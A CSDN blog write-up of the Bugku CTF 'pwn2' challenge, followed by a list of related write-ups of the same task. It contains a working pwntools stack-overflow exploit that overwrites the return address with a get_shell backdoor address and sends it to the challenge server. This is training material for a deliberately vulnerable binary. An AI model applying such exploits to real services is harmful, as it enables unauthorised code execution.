[Bugku CTF——Pwn] pwn2

最新推荐文章于 2024-09-18 20:17:35 发布

Y-peak

最新推荐文章于 2024-09-18 20:17:35 发布

阅读量367

点赞数

分类专栏： # Bugku CTF

本文链接：https://blog.youkuaiyun.com/Y_peak/article/details/115085678

版权

Bugku CTF 专栏收录该内容

3 篇文章

订阅专栏

这篇博客分享了如何利用BugkuCTF的pwn2题目中的栈溢出漏洞，通过修改返回地址获取shell。适合初学者理解栈溢出原理并实践exploit技巧。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

[Bugku CTF——Pwn] pwn2

题目地址：https://ctf.bugku.com/

额，好久不写这么简单的题目了

利用栈溢出修改返回地址就好，如果不会就去看看什么是栈溢出

exploit

from pwn import *
p = remote('114.67.246.176',11431)
get_shell = 0x0000000000400751
payload = 'a' * (0x30 + 8) + p64(get_shell)
p.send(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

bugku中pwn2的write up

darui_csdn的博客

09-06

435

bugku中pwn2的write up**最后效果如下：** 作为一个初出茅庐的菜鸟，做几个简单的pwn题练一下，正好学一下基础知识。首先来看这道题，checksec一下，我们发现，没有打开什么保护。运行一下，看看需要在哪里插入payload。注意这里需要先赋予运行权限，笔者作为新手犯了几次错误。把程序放进IDA中看一下套路流程。我们在read函数这里可以使程序溢出。也看到ebp...

BugkuCTF-PWN题pwn7-repeater详细讲解多解法

am_03的博客

08-31

4434

知识点解题流程方法一查看文件类型： 32位文件查看保护机制只开启了NX 32位IDA打开伪码： 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。解题思路此题的大概思路如下： 1、找到libc_start_main在栈内的偏移，使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc，算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试执行gd

参与评论您还未登录，请先登录后发表或查看评论

BugkuCtf-pwn2-exp

weixin_30340745的博客

08-22

407

#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...

[WP]BugkuCtf - pwn2

XiaoYan8023的博客

04-27

368

1.首先运行一下该程序 2.我们权限不够于是去修改一下权限（改前，改后）（当然，这步有可能是不需要的） 3.改后我们重新运行一下（123是输入的语句） 4.拖进IDA，查看字符串，此处应该就是得到flag的地方 5.之后我们查看main函数，并没有我们刚才所看见的那句话 6.而在get_shell函数中我...

BugKu - pwn2

Casuall的博客

07-06

3773

这道题来自于bugku旧平台的第二道pwn题，还是比较简单的，一个典型的缓冲区溢出题。首先查看一下文件类型，file pwn2,可以看到是64位的程序。然后用64位IDA打开，查看程序的逻辑。可以看到这个程序的逻辑比较简单，有一个read函数，这个函数一个危险函数，可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。然后查看字符串，看看是否有内置...

bugku pwn2

doudoudedi

06-04

1725

这道题是一道简单的栈溢出直接用IDA查看很明显的得到flag的函数直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...

BugkuCTF-PWN题pwn2-overflow超详细讲解

am_03的博客

08-30

2576

解题思路 1）计算出get_shell_的地址偏移量 2）算出来之后就直接溢出到后门函数知识点 x64函数调用规则解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前，比如int func(int a, int b, int c, int d, int e, int f, int g, int h)，首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9，其余参数存入到栈里，保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里，然后一次入栈h

BugkuCTF-PWN题canary超详细讲解

am_03的博客

08-31

2663

知识点小端序说明，数据在内存里是如何存储的？下表里数据都为16进制解题流程题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48，而read读取长度为768 v5长度为520，而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev

CTF——PWN——栈溢出（1.woof）

qq_45215609的博客

09-10

572

CTF——PWN——栈溢出（1.woof）

CTF——PWN——栈溢出（2.x64）

最新发布

qq_45215609的博客

09-18

493

CTF——PWN——栈溢出（x64）

bugku ctf misc wp2.pdf

07-05

bugku ctf misc wp2.pdf

ctf.bugku ctf题目详解——pwn2

yeshen4328的专栏

05-26

1256

ctf.bugku ctf题目详解——pwn2 题目程序分配了一个栈上的变量s，长度为0x30，并一开始置0. 9行开始从外部读取0x100的数据到s中，由此可见此处存在一个栈溢出。同时使用ida打开程序之后发现还存在一个get_shell的函数：于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则解题之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前，比如int func(int a, int b, int c, int d, int e

bugku-pwn2-wp

weixin_45427676的博客

04-05

397

下载完题后先在VM中checksec查看保护机制基本没有开什么保护，可以知道文件是64位的，用64位IDA打开，按F5键反汇编一下，看一下main函数可以发现read()函数存在栈溢出漏洞，缓冲区s的大小为0x30，而read()函数指向缓冲区中读入0x100大小的数据，所以造成栈溢出。在main函数下面有一个get_shell_()函数，打开看一下有一个system(“cat fl...

bugku-pwn2

ro4lsc的博客

05-31

670

pwn2 首先我对pwn题完全没有了解，真萌新，所以就刷刷最基础的题目吧。我是使用了pwndocker，第一次用没啥感觉。 docker exec -it mypwn /bin/bash wget https://ctf.bugku.com/files/ad67ac41b68c70c40d90bce4a39796e4/pwn2 checksec pwn2 这个东西我暂时看不懂，只知道这个pwn2是个64位程序用IDA打开，找到main函数F5 int __cdecl main(int argc,

Bugku pwn2

、moddemod

05-26

470

pwn2 题目 chmod +x pwn2 这里都关闭了，栈上可执行！这个程序里面直接留了后门get_shell_ 思路，输入的数据超过0x30栈空间大小，将get_shell_地址覆盖调用main函数的返回地址即可，即b'm' * (0x30 + 8) + p64(0x400751)，这里加上8是因为push了rbp，即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x

bugke pwn2

weixin_33858336的博客

06-05

322

根据伪代码可以看到read函数存在溢出存在一个后面那就直接覆盖返回地址就完事了从ida很直观看出s的偏移为0x30 所以到到返回地址的距离就是0x30+0x8 from pwn import *#p = process('./pwn2')p=remote('114.116.54.89','10003')elf = ELF('./pwn2')flag = elf.symb...

bugku_pwn2 | by AriSan

AriSan_XD的博客

05-02

295

bugku_pwn2栈溢出入门 | AriSan 看源码，非常明显的栈溢出直接有后门函数 checksec后没有任何保护使用 gdb调试，在 read 函数处下断点，运行，因为是64位的程序，得到栈空间为 RBP-RSI+8=0x70-0x40+8=56 使用垃圾数据填满栈空间后，覆盖返回地址为后门函数地址，直接执行后门函数成功 exp： from pwn import * p ...

Writeup bugku刷题 pwn2

Migraine‘s Blog

05-13

2396

概述：bugku新出的pwn题，练一练手关键字：栈溢出 x64 网址：https://ctf.bugku.com/challenges 分析一下代码，发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...

Bugku-pwn2新手题总结

xindada559的博客

06-07

255

题目中给了